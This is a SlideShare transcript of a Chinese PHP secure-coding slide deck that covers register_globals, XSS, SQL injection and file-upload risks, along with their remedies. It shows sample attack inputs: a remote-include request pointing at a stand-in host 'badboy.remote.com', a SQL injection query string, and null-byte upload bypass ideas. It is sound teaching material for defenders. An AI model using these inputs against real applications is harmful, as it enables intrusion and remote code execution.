Php safe-code
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Php safe-code

on

  • 1,088 views

 

Statistics

Views

Total Views
1,088
Views on SlideShare
1,088
Embed Views
0

Actions

Likes
1
Downloads
3
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Php safe-code Presentation Transcript

  • 1. PHP 安全编码 ( 二 ) @ 徐钦勇 (ken@shopex.cn)
  • 2. Register Globals: Example
    • <?php include &quot;$path/script.php&quot; ; ?>
    • 提交一个这样的请求
    • ?path=http%3A%2F%2Fbadboy.remote.com
    • include 'http://badboy.remote.com/script.php' ;
    • 这样就产生一个远程包含漏洞
  • 3. XSS: Example
  • 4. SQL Injection: Example
  • 5. 数字类型输入 数字大于 2147483647 会出现溢出出现负数
  • 6. 查询内容由外部输入 ?field=version() from injection_login where 1 #
  • 7. SQL Injection: Solution
    • 过滤输入数据
    • 单引输入数据
    • 转义输入数据, mysql_real_escape_string ()
  • 8. 葵花宝典 PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
  • 9. 文件写入点 上传文件 写日志文件
  • 10. 文件上传 1. 验证文件类型 2. 验证文件后缀名
  • 11. 文件上传 1.00 截断 2. 畸形文件名
  • 12. 文件上传
  • 13. 文件写入点 写日志文件
    • 防被下载
    • 防被执行
  • 14. COOKIE 欺诈
  • 15. Q&A
  • 16. Reference
    • 高级 PHP 应用程序漏洞审核技术